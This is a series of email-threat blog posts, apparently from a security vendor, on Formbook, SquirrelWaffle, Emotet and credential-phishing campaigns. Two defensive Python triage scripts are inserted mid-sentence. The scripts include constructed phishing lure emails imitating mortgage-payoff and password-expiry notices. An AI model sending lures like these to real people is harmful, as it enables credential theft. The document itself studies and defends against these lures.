Threat Alert / en Formbook Loader Distributed in Three “Extremely Aggressive” Email Attacks /resources/blog/february-2022/formbook-loader-distributed-three-extremely-aggressive-email-attacks <span>Formbook Loader Distributed in Three “Extremely Aggressive” Email Attacks </span> <span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="" xml:lang="">admin</span></span> <span>Tue, 02/15/2022 - 22:32</span> <a href="/resources/blog/threat-alert" hreflang="en">Threat Alert</a> <a href="/taxonomy/term/5" hreflang="en">David Bisson</a> <article><img src="/sites/default/files/2022-02/Picture3_0.jpg" width="1274" height="995" alt="Screenshot of the final Formbook attack email (Source: Zix | AppRiver)" loading="lazy" typeof="foaf:Image" /></article><p><span><span>Malicious actors launched three “extremely aggressive” email attacks in which they attempted to distribute samples of the Formbook loader.</span></span></p> <h2><span><span><span><span><span>Campaign #1: A Fake Wire Transfer Notice</span></span></span></span></span></h2> <p><span><span>Troy Gill, manager of security research at Zix | AppRiver, explained that Formbook has shown up regularly in the security firm’s filters since late 2021.</span></span></p> <p><span><span>“Our malware filters have been capturing some extremely aggressive <strong>Formbook</strong> loader attacks over the past few months using multiple different ruses attempting to dupe recipients,” he said.</span></span></p> <p><span><span>The firm detected the first attack email in mid-January. It arrived with the subject line “Wire request initiated,” and it used sender spoofing to make the message appear to have originated from an American multinational financial services company. </span></span></p> <p> </p> <figure role="group" class="align-center"><article><img src="/sites/default/files/2022-02/Picture1_0.jpg" width="1136" height="538" alt="Screenshot of the first Formbook-laden attack email. 
(Source: Zix | AppRiver)" loading="lazy" typeof="foaf:Image" /></article><figcaption>Screenshot of the first Formbook-laden attack email. (Source: Zix | AppRiver)</figcaption></figure><p> </p> <p><span><span>The email informed the recipient that the financial services company had begun processing a wire funds transfer request from their account. It went on to explain that the recipient could cancel the wire transfer by downloading a Word document. Once opened, the file downloaded a Formbook sample onto the recipient’s machine.</span></span></p> <h2><span><span><span><span><span>Campaign #2: A Bogus Letter of Dismissal</span></span></span></span></span></h2> <p><span><span>The Zix | AppRiver team came across the second Formbook attack campaign a few days later. </span></span></p> <p><span><span>Using the subject line “Letter of Dismissal,” those who crafted the email claimed to be an unnamed “HR Manager” to try to convince the recipient that their employer was letting them go.</span></span></p> <p> </p> <figure role="group" class="align-center"><article><img src="/sites/default/files/2022-02/Picture2_0.jpg" width="777" height="562" alt="Screenshot of the phony dismissal letter. (Source: Zix | AppRiver)" loading="lazy" typeof="foaf:Image" /></article><figcaption>Screenshot of the phony dismissal letter. (Source: Zix | AppRiver)</figcaption></figure><p> </p> <p><span><span>“Due to the affect of covid-19 epidemic in our company, we have no choice but to end your employment with us because we cannot service all the employees anymore,” the email stated.</span></span></p> <p><span><span>The message went on to inform the recipient that the company had sent along a two-month salary receipt as an attachment. 
When opened, however, the attached .RAR archive dropped Formbook as its payload on the victim’s computer.</span></span></p> <h2><span><span><span><span><span>Campaign #3: A Counterfeit Purchase Order</span></span></span></span></span></h2> <p><span><span>The final Formbook campaign came in the form of a minimalist attack email. It instructed the recipient to view a screenshot of a made-up purchase order embedded in the message. </span></span></p> <p> </p> <figure role="group" class="align-center"><article><img src="/sites/default/files/2022-02/Picture3_0.jpg" width="1274" height="995" alt="Screenshot of the final Formbook attack email (Source: Zix | AppRiver)" loading="lazy" typeof="foaf:Image" /></article><figcaption>Screenshot of the final Formbook attack email (Source: Zix | AppRiver)</figcaption></figure><p> </p> <p><span><span>Those responsible for the campaign included the screenshot in their email to try to trick the recipient into opening a Formbook-laden Excel spreadsheet.</span></span></p> <h2><span><span><span><span><span>An Ongoing Relationship with Formbook</span></span></span></span></span></h2> <p><span><span>The attacks discussed above aren’t the first Formbook operations detected by Zix | AppRiver in the past couple of years.</span></span></p> <p><span><span>Back in April 2020, for instance, the Zix | AppRiver team witnessed email attackers <a href="/resources/blog/april-2020/hackers-using-covid19-stimulus-exploit-end-users" rel="nofollow">impersonating the U.S. Small Business Administration</a> (SBA). The malicious actors used that guise to trick the recipient into thinking they had received an SBA grant so that they would open an attachment. If the recipient complied, the campaign initially delivered the Remcos remote access trojan before eventually dropping Formbook.</span></span></p> <p><span><span>It was about a year later when Zix | AppRiver <a href="/resources/mid-year-2021-threat-report" rel="nofollow">flagged two additional Formbook operations</a>. 
The first delivered the threat using malicious macros inside a deed-themed Word document. The other leveraged an “approved order” as a lure to deliver an executable file that began the Formbook infection process upon execution.</span></span></p> <h2><span><span><span><span><span>Defending Against Formbook Attacks</span></span></span></span></span></h2> <p><span><span>The attack campaigns discussed above highlight how organizations need to strengthen their email security postures against digital threats like Formbook. One of the ways they can do that is by investing in an <a href="/products/email-threat-protection" rel="nofollow">email security solution</a> that can scan incoming messages for malware signatures and other threat indicators. This type of solution, when combined with regular security awareness training, will help to prevent threats from gaining a foothold in employees’ inboxes, all while allowing legitimate messages to reach their intended destination.</span></span></p> Wed, 16 Feb 2022 04:32:36 +0000 admin 518 at Attackers Targeting Mortgage Servicers to Steal Email Accounts Credentials /resources/blog/february-2022/attackers-targeting-mortgage-servicers-steal-email-accounts <span>Attackers Targeting Mortgage Servicers to Steal Email Accounts Credentials </span> <span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="" xml:lang="">admin</span></span> <span>Wed, 02/09/2022 - 15:41</span> <a href="/resources/blog/threat-alert" hreflang="en">Threat Alert</a> <a href="/taxonomy/term/5" hreflang="en">David Bisson</a> <article><img src="/sites/default/files/2022-02/Picture2.jpg" width="1486" height="836" alt="Screenshot of the jump page. 
(Source: Zix | AppRiver)" loading="lazy" typeof="foaf:Image" /></article><p><span><span>Digital attackers are targeting mortgage servicers and their clients to try to steal victims’ email account credentials.</span></span></p> <h1><span><span><span><span><span>Data Theft as a Final Payoff</span></span></span></span></span></h1> <p><span><span>At the end of January, the Zix | AppRiver team flagged an email informing the recipient that they needed to submit a mortgage payment prior to the date contained in an attached payoff statement.</span></span></p> <p><span><span>“Attached” is an odd choice of words here considering that the email didn’t arrive with an attached file. Instead, it arrived with an embedded hyperlinked button named, “Access Payoff Statement File Here.”</span></span></p> <p> </p> <figure role="group" class="align-center"><article><img src="/sites/default/files/2022-02/Picture1.jpg" width="1248" height="910" alt="Screenshot of the mortgage-themed attack email. (Source: Zix | AppRiver)" loading="lazy" typeof="foaf:Image" /></article><figcaption>Screenshot of the mortgage-themed attack email. (Source: Zix | AppRiver)</figcaption></figure><p> </p> <p><span><span>Misleading wording wasn’t the only element that gave the attack email away as a fake. As seen in the screenshot included above, the message came with a signature block indicating that it had originated from a nationwide mortgage lender service…with the exception of the physical address. That location pointed to another mortgage service entirely. </span></span></p> <p><span><span>Other signs gave the email away as well. For instance, the sender email address ended with .EDU—an unusual domain for an established mortgage service company. 
Zix | AppRiver reasoned that those responsible for this attack likely compromised the account of someone working at an educational institution to conduct their campaign.</span></span></p> <p><span><span>Not only that, but the phone number included in the signature block didn’t belong to the mortgage lender specifically mentioned in the message or the other company whose address appeared in the email. A Google search of the number didn’t yield any meaningful results.</span></span></p> <h1><span><span><span><span><span>Following the Button</span></span></span></span></span></h1> <p><span><span>Clicking on the embedded button redirected the recipient to a website that appeared to be a page operated by the named mortgage lender service. The page used stolen branding to convince the recipient to click on a “Payoff Statement Access Here” button so that they could view an “encrypted payoff mortgage file.”</span></span></p> <p><span><span>Once again, however, the jump page gave itself away as a fake. How? By the inclusion of a statement indicating that whoever built the website did so using site123[.]me, a service for building free websites. </span></span></p> <p> </p> <figure role="group" class="align-center"><article><img src="/sites/default/files/2022-02/Picture2.jpg" width="1486" height="836" alt="Screenshot of the jump page. (Source: Zix | AppRiver)" loading="lazy" typeof="foaf:Image" /></article><figcaption>Screenshot of the jump page. (Source: Zix | AppRiver)</figcaption></figure><p> </p> <p><span><span>Given its profile in the mortgage lending field, the targeted service likely relies on its own web team—not a free website builder—to maintain its digital presence.</span></span></p> <p><span><span>It’s therefore not surprising that the jump page didn’t present a mortgage payoff statement to the user. 
Instead, it redirected them to a phishing landing page with an even more suspicious domain name to try to steal their email account credentials.</span></span></p> <p> </p> <figure role="group" class="align-center"><article><img src="/sites/default/files/2022-02/Picture3.jpg" width="1486" height="825" alt="Screenshot of the phishing landing page. (Source: Zix | AppRiver)" loading="lazy" typeof="foaf:Image" /></article><figcaption>Screenshot of the phishing landing page. (Source: Zix | AppRiver)</figcaption></figure><p> </p> <h1><span><span><span><span><span>Keeping a Fixed Email Security Focus for the Long Term</span></span></span></span></span></h1> <p> </p> <p><span><span>Troy Gill, manager of security research at Zix | AppRiver, doesn’t think that email attackers will refrain from using mortgages as a lure anytime soon.</span></span></p> <p><span><span>“Business email compromise attacks targeting mortgage servicers and their clients continue to be an ongoing threat to customers,” he said. “The simplicity of the attack along with the low barrier to entry with a quick payoff keeps it an enticing vector for attackers.”</span></span></p> <p><span><span>That’s especially true now that mortgage rates have leapt to nearly 4% in recent weeks, the highest they’ve been since October 2019, as <a href="https://www.mortgagenewsdaily.com/markets/mortgage-rates-02042022" rel="nofollow">Mortgage News Daily</a> reported.</span></span></p> <p><span><span>Acknowledging that reality, organizations need to take action to defend themselves against mortgage-themed campaigns. They can do so by using security awareness training to educate their employees about common tactics and slip-ups committed by email attackers. 
They can then complement those measures with an <a href="/products/email-threat-protection" rel="nofollow">email security solution</a> that can scan incoming messages for malware signatures and other threat indicators, blocking suspicious messages before they reach an employee’s inbox while allowing legitimate messages to reach their intended destination.</span></span></p> Wed, 09 Feb 2022 21:41:07 +0000 admin 516 at Microsoft Exchange Servers Hacked to Distribute SquirrelWaffle /resources/blog/december-2021/microsoft-exchange-servers-hacked-distribute-squirrelwaffle <span>Microsoft Exchange Servers Hacked to Distribute SquirrelWaffle</span> <span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="" xml:lang="">admin</span></span> <span>Mon, 12/06/2021 - 15:35</span> <a href="/resources/blog/threat-alert" hreflang="en">Threat Alert</a> <a href="/taxonomy/term/5" hreflang="en">David Bisson</a> <article><img src="/sites/default/files/2021-12/man_coding.jpg" width="1400" height="700" alt="" loading="lazy" typeof="foaf:Image" /></article><p><span><span>Digital attackers hacked organizations’ vulnerable Microsoft Exchange Servers to distribute SquirrelWaffle malware.</span></span></p> <h2><span><span><span><span><span>Details of the Attack Campaign</span></span></span></span></span></h2> <p><span><span>In mid-November 2021, <a href="https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html" rel="nofollow">Trend Micro</a> examined the initial access vector for several digital intrusions that occurred in the Middle East.</span></span></p> <p><span><span>The security firm’s incident response team determined that all the attacks originated from on-premises Microsoft Exchange Servers. 
A closer look uncovered evidence of malicious actors having exploited <a href="/resources/blog/march-2021/hafnium-just-first-many-threat-actors-exploit-proxylogon" rel="nofollow">ProxyLogon</a> and ProxyShell on those resources. </span></span></p> <p><span><span>One of those campaigns leveraged conversation hijacking, a tactic executed by the Emotet gang <a href="/resources/blog/may-2020/emotet-actors-use-conversation-hijacking-attack-deliver-qakbot" rel="nofollow">more than</a> <a href="/resources/blog/november-2021/emotets-it-again" rel="nofollow">once</a>, to inject themselves into existing email threats. Those responsible for the attack also used true account names from the victim’s domain for the sender and the recipient. In doing so, they increased the chances that someone would follow the email’s instructions.</span></span></p> <p> </p> <figure role="group" class="align-center"><article><img src="/sites/default/files/2021-12/Picture1.png" width="856" height="271" alt="The malicious spam email received by targets. (Source: Trend Micro)" loading="lazy" typeof="foaf:Image" /></article><figcaption>The malicious spam email received by targets. (Source: Trend Micro)</figcaption></figure><p> </p> <p><span><span>As is evident in the above screenshot, the email didn’t exactly relay its instructions eloquently. </span></span></p> <p><span><span>“Our specialists composed desired document and I send it to you,” it informed the recipient. “Document can be found through this link.”</span></span></p> <p><span><span>Trend Micro went on to inspect the headers for the attack emails. They discovered that the mail path was internal between three Exchange Servers’ mailboxes. The threat actor didn’t drop any tools for moving laterally. 
They also didn’t execute malware on the Exchange servers that would have triggered alerts before the emails spread across the environment.</span></span></p> <p><span><span>“The attacker exploited the Exchange servers to deliver internal mails,” Trend Micro explained. “This was all done to catch users off-guard, making them more likely to click the link and open the dropped Microsoft Excel or Word file.”</span></span></p> <p><span><span>Both links embedded in the malicious emails dropped a .ZIP file containing a Microsoft Excel sheet or Word document. Once opened, the documents used malicious Excel 4.0 macros to download and execute a DLL related to Qbot (otherwise known as “QakBot”), and the infection chain ultimately left the machine infected with SquirrelWaffle.</span></span></p> <h2><span><span><span><span><span>Squirrel-What?</span></span></span></span></span></h2> <p><span><span>SquirrelWaffle first made news in late October when <a href="https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html" rel="nofollow">Cisco Talos</a> spotted some spam campaigns infecting systems with the new malware loader. Upon successful infection, SquirrelWaffle granted threat actors the foothold they needed to infiltrate organizations’ systems and network environments as well as to conduct additional compromise attempts and malware infections.</span></span></p> <p><span><span>The Zix | AppRiver team observed this exact behavior in a SquirrelWaffle campaign that took place in mid-November.</span></span></p> <p><span><span>Like the operation detected by Trend Micro, the malicious actors behind this attack attempt used conversation hijacking techniques to inject themselves into an existing email thread with the subject line “Re: S.A.M. 
Newark Lay out.” </span></span></p> <p><span><span>The attackers said that they had “uploaded some additional info regarding the recent contract and payslip.” They went on to instruct the recipient that they could resolve a previously mentioned problem if they chose to “follow steps via the link lower.”</span></span></p> <p> </p> <figure role="group" class="align-center"><article><img src="/sites/default/files/2021-12/Picture2.jpg" width="780" height="351" alt="Screenshot of the November SquirrelWaffle email. (Source: Zix | AppRiver)" loading="lazy" typeof="foaf:Image" /></article><figcaption>Screenshot of the November SquirrelWaffle email. (Source: Zix | AppRiver)</figcaption></figure><p> </p> <p><span><span>Clicking on either of the links led victims to a SquirrelWaffle payload. At that point, the malware followed up by dropping either QakBot or Cobalt Strike onto the infected machine.</span></span></p> <h2><span><span><span><span><span>Defending Against Email-Borne SquirrelWaffle Attacks</span></span></span></span></span></h2> <p><span><span>The attack instances discussed above highlight the need for organizations to defend themselves against SquirrelWaffle. One of the ways they can do that is by reviewing their vulnerability management programs to make sure they’re prioritizing and implementing software patches on a timely basis. Regarding the campaign detected by Trend Micro, for example, Microsoft released a patch for ProxyLogon in <a href="https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/" rel="nofollow">March</a> and similar fixes for ProxyShell <a href="https://techcommunity.microsoft.com/t5/exchange-team-blog/proxyshell-vulnerabilities-and-your-exchange-server/ba-p/2684705" rel="nofollow">a few months later</a>. 
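</span></span></p>
<p>The header detail Trend Micro relied on above, that the mail path ran only between internal Exchange mailboxes, is something a mail team can check for itself. The script below is an added example written for this page; it is not code from Trend Micro or Zix | AppRiver. It walks a message’s <code>Received:</code> chain oldest-first, classifies each hop by the address the receiving server recorded (the HELO name is sender-controlled, the observed address is not), and pairs an internal-only path with any link in the body that points outside the organization. Mail that never crossed the perimeter gateway was never seen by the gateway’s filters, so an internal sender plus an internal-only path plus an external download link is the shape of the hijacked-thread messages described here. The domain <code>example.org</code>, the hostnames, addresses and both messages are constructed for the example; the <code>RFC1918</code> list stands in for whatever address space your Exchange servers actually use.</p>

```python
"""Received-chain triage for mail injected from inside the perimeter.

Added example, not code from Trend Micro or Zix | AppRiver. Domain, hosts,
addresses and message bodies are constructed; replace ORG_DOMAIN and RFC1918
with your own environment's values.
"""
import ipaddress
import re
from email import message_from_string, policy
from email.utils import parseaddr
from urllib.parse import urlparse

ORG_DOMAIN = "example.org"  # assumed victim domain
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# "from <helo-name> (<observed-ip>) by <receiving-host>": the HELO name is chosen
# by the sending side, the address in parentheses is what the receiver observed.
RECEIVED_RE = re.compile(r"from\s+(\S+)(?:\s+\(([^)]*)\))?\s+by\s+(\S+)", re.I | re.S)
IPV4_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
HREF_RE = re.compile(r'href=["\']([^"\']+)["\']', re.I)


def _observed_ip(paren_text):
    m = IPV4_RE.search(paren_text or "")
    try:
        return ipaddress.ip_address(m.group(1)) if m else None
    except ValueError:
        return None


def _internal_hop(helo, ip):
    """Trust the observed address when there is one; fall back to the HELO name."""
    if ip is not None:
        return any(ip in net for net in RFC1918)
    helo = helo.lower().strip("[]")
    return helo == ORG_DOMAIN or helo.endswith("." + ORG_DOMAIN)


def received_hops(msg):
    """Return the Received: chain oldest-first, one dict per hop."""
    hops = []
    for hdr in reversed(msg.get_all("Received", [])):
        m = RECEIVED_RE.search(str(hdr))
        if not m:
            continue  # unusual layout; leave it for a human
        helo, paren, by_host = m.groups()
        ip = _observed_ip(paren)
        hops.append({"from": helo, "ip": str(ip) if ip else None,
                     "by": by_host, "internal": _internal_hop(helo, ip)})
    return hops


def external_links(msg):
    """Hrefs in the body whose host is not under ORG_DOMAIN."""
    body = msg.get_body(preferencelist=("html", "plain"))
    text = body.get_content() if body else ""
    out = []
    for url in HREF_RE.findall(text):
        host = (urlparse(url).hostname or "").lower()
        if host and host != ORG_DOMAIN and not host.endswith("." + ORG_DOMAIN):
            out.append(url)
    return out


def assess(raw):
    """Flag: internal sender + every hop internal + a link leading outside."""
    msg = message_from_string(raw, policy=policy.default)
    sender = parseaddr(str(msg.get("From", "")))[1].lower()
    sender_internal = sender.endswith("@" + ORG_DOMAIN)
    hops = received_hops(msg)
    all_internal = bool(hops) and all(h["internal"] for h in hops)
    links = external_links(msg)
    return {"hops": hops, "sender_internal": sender_internal,
            "all_hops_internal": all_internal, "external_links": links,
            "flag": sender_internal and all_internal and bool(links)}


# Constructed sample 1: thread-hijack mail relayed only between Exchange servers.
RAW_INTERNAL = """\
Received: from EX02.example.org (10.20.0.12) by EX03.example.org (10.20.0.13)
 with Microsoft SMTP Server id 15.1.2308.8; Tue, 16 Nov 2021 09:14:02 +0000
Received: from EX01.example.org (10.20.0.11) by EX02.example.org (10.20.0.12)
 with Microsoft SMTP Server id 15.1.2308.8; Tue, 16 Nov 2021 09:14:01 +0000
From: Alice Example <alice@example.org>
To: Bob Example <bob@example.org>
Subject: Re: contract
Content-Type: text/html; charset=utf-8

<html><body><p>Our specialists composed desired document and I send it to you.
Document can be found through this <a href="https://files.invalid/doc.zip">link</a>.</p></body></html>
"""

# Constructed sample 2: ordinary inbound mail that entered through the gateway.
RAW_EXTERNAL = """\
Received: from mail-gw.example.org (10.20.0.5) by EX01.example.org (10.20.0.11)
 with Microsoft SMTP Server id 15.1.2308.8; Tue, 16 Nov 2021 10:02:11 +0000
Received: from mta7.bulkmail.invalid (203.0.113.45) by mail-gw.example.org (10.20.0.5)
 with ESMTPS; Tue, 16 Nov 2021 10:02:10 +0000
From: Newsletter <news@bulkmail.invalid>
To: Bob Example <bob@example.org>
Subject: October update
Content-Type: text/html; charset=utf-8

<html><body><a href="https://www.bulkmail.invalid/october">Read online</a></body></html>
"""

if __name__ == "__main__":
    for name, raw in (("internal", RAW_INTERNAL), ("external", RAW_EXTERNAL)):
        r = assess(raw)
        print(name, "flag =", r["flag"], [(h["from"], h["internal"]) for h in r["hops"]])
```

<p>The rule is a triage heuristic, not a verdict: legitimate internal mail links to external sites all the time, so the output belongs in a review queue or as one signal in a larger score. It is also only as good as the address ranges behind <code>RFC1918</code>; if your servers relay through public addresses, list those instead.</p>
<p><span><span>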
Organizations can then go on to pair their vulnerability management efforts with a <a href="/products/email-threat-protection" rel="nofollow">multi-layered email security solution</a> that scans incoming messages for potential threats. </span></span></p> Mon, 06 Dec 2021 21:35:27 +0000 admin 502 at Microsoft Password Expiration Scam Uses Customized Image to Steal Victims’ Account Details /resources/blog/november-2021/microsoft-password-expiration-scam-uses-customized-image-steal-victims <span>Microsoft Password Expiration Scam Uses Customized Image to Steal Victims’ Account Details </span> <span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="" xml:lang="">admin</span></span> <span>Mon, 11/29/2021 - 15:00</span> <a href="/resources/blog/threat-alert" hreflang="en">Threat Alert</a> <a href="/taxonomy/term/5" hreflang="en">David Bisson</a> <article><img src="/sites/default/files/2021-11/Picture1_0.jpg" width="1205" height="762" alt="Screenshot of the fake Microsoft password expiration notice. (Source: Zix | AppRiver)" loading="lazy" typeof="foaf:Image" /></article><p><span><span>A Microsoft password expiration scam used an image customized with a recipient’s email address and domain to steal their account credentials.</span></span></p> <h2><span><span><span><span><span>“Request (for Data Theft) Received”</span></span></span></span></span></h2> <p><span><span>In early November, Zix | AppRiver flagged an email that appeared to originate from the helpdesk at a recipient’s company. (The attackers included “HelpDesk” in their email’s subject line to support this ruse.)</span></span></p> <p><span><span>But the email didn’t originate from a helpdesk team. 
Its sender line indicated that it came from a B2B platform serving the commercial real estate industry.</span></span></p> <p><span><span>Using branding stolen from Microsoft, the attack email impersonated a password expiration notice and informed the recipient that their password was set to expire in seven days. It included the recipient’s name, domain, and email address to add a sense of legitimacy.</span></span></p> <p><span><span>From there, the attack email inst
ructed the recipient to “take the time now to maintain your password activity to avoid login interruption” by clicking on a “Keep My Password” button.</span></span></p> <p> </p> <figure role="group" class="align-center"><article><img src="/sites/default/files/2021-11/Picture1_0.jpg" width="1205" height="762" alt="Screenshot of the fake Microsoft password expiration notice. (Source: Zix | AppRiver)" loading="lazy" typeof="foaf:Image" /></article><figcaption>Screenshot of the fake Microsoft password expiration notice. (Source: Zix | AppRiver)</figcaption></figure><p> </p> <p><span><span>As you can see from the screenshot above, the email included the warning that “Microsoft will not be held responsible for any account loss.” </span></span></p> <p><span><span>That’s an imperfect replication of Microsoft’s terms of service. These read as follows: “Microsoft will not be liable for any loss that you may incur as a result of someone else using your password or account, either with or without your knowledge. However, you could be held liable for losses incurred by Microsoft or another party due to someone else using your account or password.”</span></span></p> <p><span><span>Now, this isn’t the first time Zix | AppRiver came across a Microsoft-themed password expiration scam. Not by a long shot. But it is the first instance where the security firm observed a specific tactic in play. 
</span></span></p> <p><span><span>Here’s Troy Gill, manager of threat intelligence at Zix | AppRiver, with more.</span></span></p> <p><span><span>“Instead of the normal text, it utilized an image link for the lure <em>but</em> the image itself was customized to contain the recipient’s email address and domain,” he explained. “It was also an automated attack being sent in large volumes indicating the attacker had an automated setup for these and not manually changing each image for the recipients.”</span></span></p> <h2><span><span><span><span><span>“Keep My Password”…Literally, You Can Take It</span></span></span></span></span></h2> <p><span><span>If a user complied with the attackers’ instructions and clicked on the customized image, the campaign redirected them to a phishing page hosted on Cloudflare’s workers.dev, a living-off-the-land (LotL) choice that let the attackers trade on the reputation of a trusted platform.</span></span></p> <p> </p> <figure role="group" class="align-center"><article><img src="/sites/default/files/2021-11/Picture2.jpg" width="1451" height="828" alt="Screenshot of the phishing page abusing Cloudflare’s workers.dev. (Source: Zix | AppRiver)" loading="lazy" typeof="foaf:Image" /></article><figcaption>Screenshot of the phishing page abusing Cloudflare’s workers.dev. (Source: Zix | AppRiver)</figcaption></figure><p> </p> <p><span><span>Malicious actors continue to resort to LotL techniques as a way of evading detection. Back in <a href="/resources/blog/october-2021/docusign-abused-phishers-target-victims-email-account-credentials" rel="nofollow">September 2021</a>, for instance, Zix | AppRiver came across an operation that abused DocuSign to trick victims into handing over their credentials for Outlook, Office365, or another email client.  
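</span></span></p>
<p>The tells called out in this post and in the mortgage-payoff post above are mechanical enough to check automatically: a message that says “attached” but carries no attachment, a display name naming a brand the sender domain does not match (the .EDU sender), a call-to-action link hosted on a free site builder or worker platform rather than on the brand’s own domain, and a link whose only content is an image. The script below is an added example written for this page, not Zix | AppRiver’s code. <code>FREE_HOSTING</code> lists only the two services named on this page; a real deployment would feed that list from its own telemetry. The three messages, the addresses and the domains in them are constructed for the example.</p>

```python
"""Lure triage for brand-impersonation phishing.

Added example, not Zix | AppRiver's code. FREE_HOSTING holds the two
services named on the page; the messages below are constructed.
"""
import re
from email import message_from_string, policy
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

FREE_HOSTING = ("site123.me", "workers.dev")
# Words that appear in display names without naming a brand.
GENERIC_WORDS = {"team", "service", "services", "servicing", "support", "helpdesk",
                 "desk", "notification", "notifications"}


class _Anchors(HTMLParser):
    """Collect every <a href> with its visible text and the number of nested <img>."""

    def __init__(self):
        super().__init__()
        self.anchors, self._cur = [], None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "a":
            self._cur = {"href": attrs.get("href", ""), "text": "", "imgs": 0}
        elif tag == "img" and self._cur is not None:
            self._cur["imgs"] += 1

    def handle_data(self, data):
        if self._cur is not None:
            self._cur["text"] += data.strip()

    def handle_endtag(self, tag):
        if tag == "a" and self._cur is not None:
            self.anchors.append(self._cur)
            self._cur = None


def _under(host, domain):
    return host == domain or host.endswith("." + domain)


def triage(raw):
    """Return a list of human-readable findings; an empty list means no tell fired."""
    msg = message_from_string(raw, policy=policy.default)
    display, addr = parseaddr(str(msg.get("From", "")))
    sender_domain = addr.rsplit("@", 1)[-1].lower()
    body = msg.get_body(preferencelist=("html", "plain"))
    markup = body.get_content() if body else ""
    parser = _Anchors()
    parser.feed(markup)
    text = re.sub(r"<[^>]+>", " ", markup)
    findings = []

    # 1. "See attached" with nothing attached: the button is the attachment.
    if re.search(r"\battach(?:ed|ment)\b", text, re.I) and not list(msg.iter_attachments()):
        findings.append("mentions an attachment but carries none")

    # 2. Brand in the display name, unrelated sender domain.
    brand = [w for w in re.findall(r"[a-z]{4,}", display.lower()) if w not in GENERIC_WORDS]
    if brand and not any(w in sender_domain for w in brand):
        findings.append(f"display name '{display}' does not match sender domain {sender_domain}")

    # 3. Where each call to action leads, and whether it is an image-only link.
    for a in parser.anchors:
        host = (urlparse(a["href"]).hostname or "").lower()
        if not host:
            continue
        if any(_under(host, h) for h in FREE_HOSTING):
            findings.append(f"link hosted on free platform {host}")
        elif not _under(host, sender_domain):
            findings.append(f"link host {host} is outside sender domain {sender_domain}")
        if a["imgs"] and not a["text"]:
            findings.append(f"image-only call to action -> {host}")
    return findings


# Constructed samples modelled on the two lures described in these posts.
MORTGAGE_LURE = """\
From: Acme Mortgage Servicing <jdoe@campus.invalid>
To: Homeowner <owner@example.net>
Subject: Payoff Statement
Content-Type: text/html; charset=utf-8

<html><body><p>Please remit payment before the date in the attached payoff statement.</p>
<a href="https://acme-payoff.site123.me/">Access Payoff Statement File Here</a></body></html>
"""

PASSWORD_LURE = """\
From: IT HelpDesk <notify@b2b-platform.invalid>
To: owner@example.net
Subject: HelpDesk: password expiration
Content-Type: text/html; charset=utf-8

<html><body><a href="https://keep-my-password.workers.dev/owner"><img src="cid:notice"></a></body></html>
"""

LEGIT_NOTICE = """\
From: Acme Mortgage Servicing <alerts@acmemortgage.invalid>
To: owner@example.net
Subject: Your statement is ready
Content-Type: text/html; charset=utf-8

<html><body><p>Your monthly statement is ready in the portal.</p>
<a href="https://portal.acmemortgage.invalid/statements">View statement</a></body></html>
"""

if __name__ == "__main__":
    for label, raw in (("mortgage", MORTGAGE_LURE), ("password", PASSWORD_LURE), ("legit", LEGIT_NOTICE)):
        print(label, "->", triage(raw) or ["no findings"])
```

<p>None of these findings is proof on its own; a marketing mail from a hosted newsletter platform will trip the domain check, and a legitimate notice can mention an attachment it forgot. Their value is in combination and as routing signals: two or more findings on a message whose call to action is a credential page is the profile both posts describe.</p>
<p><span><span>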
</span></span></p> <p><span><span>That’s not even counting <a href="/resources/blog/september-2021/7-attacks-where-phishers-abused-legitimate-microsoft-services" rel="nofollow">all the times</a> email attackers abused Azure, Sway, and other legitimate Microsoft services to phish victims’ details in recent years.</span></span></p> <p><span><span>For this attack attempt, the phishing site impersonated a Microsoft login page that also included the victim’s domain and email address. The purpose of this personalization was to convince the victim that nothing was wrong.</span></span></p> <h2><span><span><span><span><span>Defending against a Fake Microsoft Password Expiration Email</span></span></span></span></span></h2> <p><span><span>The attack campaign described above highlights the need for organizations to defend themselves against Microsoft-themed email attacks. One of the ways they can do that is by familiarizing their employees with what an email from their helpdesk will actually look like. They can complement that security awareness with a <a href="/products/email-threat-protection" rel="nofollow">multi-layered email security platform</a>.</span></span></p> Mon, 29 Nov 2021 21:00:52 +0000 admin 493 at Emotet’s at It Again! 
/resources/blog/november-2021/emotets-it-again <span>Emotet’s at It Again!</span> <span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="" xml:lang="">admin</span></span> <span>Tue, 11/23/2021 - 15:13</span> <a href="/resources/blog/threat-alert" hreflang="en">Threat Alert</a> <a href="/taxonomy/term/5" hreflang="en">David Bisson</a> <article><img src="/sites/default/files/2021-11/emotet_detected.png" width="1400" height="700" alt="" loading="lazy" typeof="foaf:Image" /></article><p><span><span>Emotet has resumed operations nearly 10 months after an international coordinated action took control of the botnet’s infrastructure.</span></span></p> <h2><span><span><span><span><span>A Familiar Tactic</span></span></span></span></span></h2> <p><span><span>On November 15, the Zix | AppRiver team detected 221 email attack attempts from a revived Emotet botnet.</span></span></p> <p><span><span>Some of the instances scraped entire conversations, while others scraped only the subject and sender. Either way, the attackers could inject themselves into conversations between people who had already corresponded, which increased the likelihood of the original sender (now the recipient) following the attackers’ instructions.</span></span></p> <p><span><span>The commands themselves weren’t flashy. In one of their emails, the attackers asked the recipient to “please open the attached document.”  </span></span></p> <p> </p> <figure role="group" class="align-center"><article><img src="/sites/default/files/2021-11/Picture3.jpg" width="1249" height="652" alt="Screenshot of one Emotet attack email. (Source: Zix | AppRiver)" loading="lazy" typeof="foaf:Image" /></article><figcaption>Screenshot of one Emotet attack email. 
